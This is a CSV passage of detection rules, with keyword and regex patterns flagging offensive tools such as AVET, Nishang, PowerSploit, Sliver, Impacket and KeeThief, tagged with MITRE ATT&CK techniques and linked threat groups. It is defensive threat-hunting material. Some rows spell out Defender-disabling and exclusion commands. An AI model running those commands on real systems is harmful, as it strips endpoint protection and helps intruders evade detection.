"*add_evasion has_public_desktop*",".{0,1000}add_evasion\shas_public_desktop.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33292"
"*add_evasion has_recent_files*",".{0,1000}add_evasion\shas_recent_files.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33293"
"*add_evasion has_recycle_bin*",".{0,1000}add_evasion\shas_recycle_bin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33294"
"*add_evasion has_username *",".{0,1000}add_evasion\shas_username\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33295"
"*add_evasion has_vm_mac*",".{0,1000}add_evasion\shas_vm_mac.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33296"
"*add_evasion has_vm_regkey*",".{0,1000}add_evasion\shas_vm_regkey.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33297"
"*add_evasion hide_console*",".{0,1000}add_evasion\shide_console.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33298"
"*add_evasion interaction_getchar*",".{0,1000}add_evasion\sinteraction_getchar.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33299"
"*add_evasion interaction_system_pause*",".{0,1000}add_evasion\sinteraction_system_pause.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33300"
"*add_evasion is_debugger_present*",".{0,1000}add_evasion\sis_debugger_present.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33301"
"*add_evasion sleep_by_ping *",".{0,1000}add_evasion\ssleep_by_ping\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33302"
"*add_malicious_pager*",".{0,1000}add_malicious_pager.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","33303"
"*add_malicious_pre_commit*",".{0,1000}add_malicious_pre_commit.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","33304"
"*Add_Privilege /Process:* /Privilege:*",".{0,1000}Add_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","33305"
"*add_random_newlines(obfuscated_code*",".{0,1000}add_random_newlines\(obfuscated_code.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","33306"
"*add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c*",".{0,1000}add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33307"
"*adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e*",".{0,1000}adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33313"
"*addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc*",".{0,1000}addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#filehash","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","33320"
"*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *",".{0,1000}addcomputer\.py\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33321"
"*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *",".{0,1000}addcomputer\.py\s\-delete\s\-computer\-name\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33322"
"*addcomputer.py*",".{0,1000}addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33323"
"*Add-ConstrainedDelegationBackdoor*",".{0,1000}Add\-ConstrainedDelegationBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33324"
"*--add-data rarreg.key*",".{0,1000}\-\-add\-data\srarreg\.key.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","33325"
"*Add-Exfiltration.ps1*",".{0,1000}Add\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33327"
"*Add-Exfiltration.ps1*",".{0,1000}Add\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33328"
"*Adding GlobaLeaks PGP key to trusted APT keys*",".{0,1000}Adding\sGlobaLeaks\sPGP\skey\sto\strusted\sAPT\skeys.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","33329"
"*Add-KeePassConfigTrigger *",".{0,1000}Add\-KeePassConfigTrigger\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","33330"
"*Add-KeePassConfigTrigger*",".{0,1000}Add\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","33331"
"*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","33332"
"*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","33333"
"*Add-KeeThiefLurker *",".{0,1000}Add\-KeeThiefLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","33334"
"*Add-KeyCredentials -target *",".{0,1000}Add\-KeyCredentials\s\-target\s.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","33335"
"*Add-Member -MemberType NoteProperty -Name Ping -Value (Test-Connection -ComputerName * -Quiet -Count 1) -Force*",".{0,1000}Add\-Member\s\-MemberType\sNoteProperty\s\-Name\sPing\s\-Value\s\(Test\-Connection\s\-ComputerName\s.{0,1000}\s\-Quiet\s\-Count\s1\)\s\-Force.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","33336"
"*AddMenuItemA(""Grab browser Passwords""*",".{0,1000}AddMenuItemA\(\""Grab\sbrowser\sPasswords\"".{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#content","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","33337"
"*AddMenuItemA(""Pentest""*",".{0,1000}AddMenuItemA\(\""Pentest\"".{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#content","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","33338"
"*Add-MpPreference -DisableBehaviorMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviorMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33339"
"*Add-MpPreference -DisableBehaviourMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviourMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33340"
"*Add-MpPreference -DisDisableRealtimeMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisDisableRealtimeMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33341"
"*Add-MpPreference -ExclusionPath *",".{0,1000}Add\-MpPreference\s\-ExclusionPath\s.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33342"
"*Add-MpPreference -ExclustionPath c:\users\public*",".{0,1000}Add\-MpPreference\s\-ExclustionPath\sc\:\\users\\public.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33346"
"*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*",".{0,1000}Add\-ObjectAcl\s\-TargetADSprefix\s\'CN\=AdminSDHolder.{0,1000}CN\=System\'\s\-PrincipalSamAccountName\s.{0,1000}\s\-Rights\sAll.{0,1000}","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","10","1","18","3","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z","33347"
"*Add-Persistence *",".{0,1000}Add\-Persistence\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","33348"
"*Add-Persistence*",".{0,1000}Add\-Persistence.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","33349"
"*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33350"
"*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33351"
"*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33352"
"*Add-PodeEndpoint -Address localhost -Port *",".{0,1000}Add\-PodeEndpoint\s\-Address\slocalhost\s\-Port\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","33353"
"*addPreloadToPrivesc*",".{0,1000}addPreloadToPrivesc.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","33354"
"*Add-Printer -Name ""http://$server/$printername"" -PortName ""http://$server/printers/$printername/.printer""*",".{0,1000}Add\-Printer\s\-Name\s\""http\:\/\/\$server\/\$printername\""\s\-PortName\s\""http\:\/\/\$server\/printers\/\$printername\/\.printer\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","33355"
